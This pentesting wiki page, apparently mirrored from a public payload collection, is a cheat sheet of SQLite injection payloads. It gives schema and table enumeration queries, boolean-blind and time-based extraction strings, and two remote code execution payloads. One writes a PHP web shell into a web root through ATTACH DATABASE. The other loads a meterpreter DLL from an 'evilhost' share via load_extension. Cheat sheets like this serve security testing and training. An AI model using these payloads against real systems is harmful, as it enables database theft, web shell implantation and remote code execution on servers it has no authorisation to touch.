> For the complete documentation index, see [llms.txt](https://notes.brinkles.wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.brinkles.wiki/tools/web-app-pentesting/payload-all-the-things/sql-injection/sqlite-injection.md).

# SQLite Injection

## Summary

* [SQLite comments](broken://pages/76VodaF53IEkIg4uaxfH)
* [SQLite version](broken://pages/76VodaF53IEkIg4uaxfH)
* [String based - Extract database structure](broken://pages/76VodaF53IEkIg4uaxfH)
* [Integer/String based - Extract table name](broken://pages/76VodaF53IEkIg4uaxfH)
* [Integer/String based - Extract column name](broken://pages/76VodaF53IEkIg4uaxfH)
* [Boolean - Count number of tables](broken://pages/76VodaF53IEkIg4uaxfH)
* [Boolean - Enumerating table name](broken://pages/76VodaF53IEkIg4uaxfH)
* [Boolean - Extract info](broken://pages/76VodaF53IEkIg4uaxfH)
* [Time based](broken://pages/76VodaF53IEkIg4uaxfH)
* [Remote Command Execution using SQLite command - Attach Database](broken://pages/76VodaF53IEkIg4uaxfH)
* [Remote Command Execution using SQLite command - Load\_extension](broken://pages/76VodaF53IEkIg4uaxfH)
* [References](broken://pages/76VodaF53IEkIg4uaxfH)

## SQLite comments

```sql
--
/**/
```

## SQLite version

```sql
select sqlite_version();
```

## String based - Extract database structure

```sql
SELECT sql FROM sqlite_schema
```

## Integer/String based - Extract table name

```sql
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
```

Use limit X+1 offset X, to extract all tables.

## Integer/String based - Extract column name

```sql
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
```

For a clean output

```sql
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
```

## Boolean - Count number of tables

```sql
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
```

## Boolean - Enumerating table name

```sql
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
```

## Boolean - Extract info

```sql
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
```

## Time based

```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
```

## Remote Command Execution using SQLite command - Attach Database

```sql
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
```

## Remote Command Execution using SQLite command - Load\_extension

```sql
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```

Note: By default this component is disabled

## References

[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
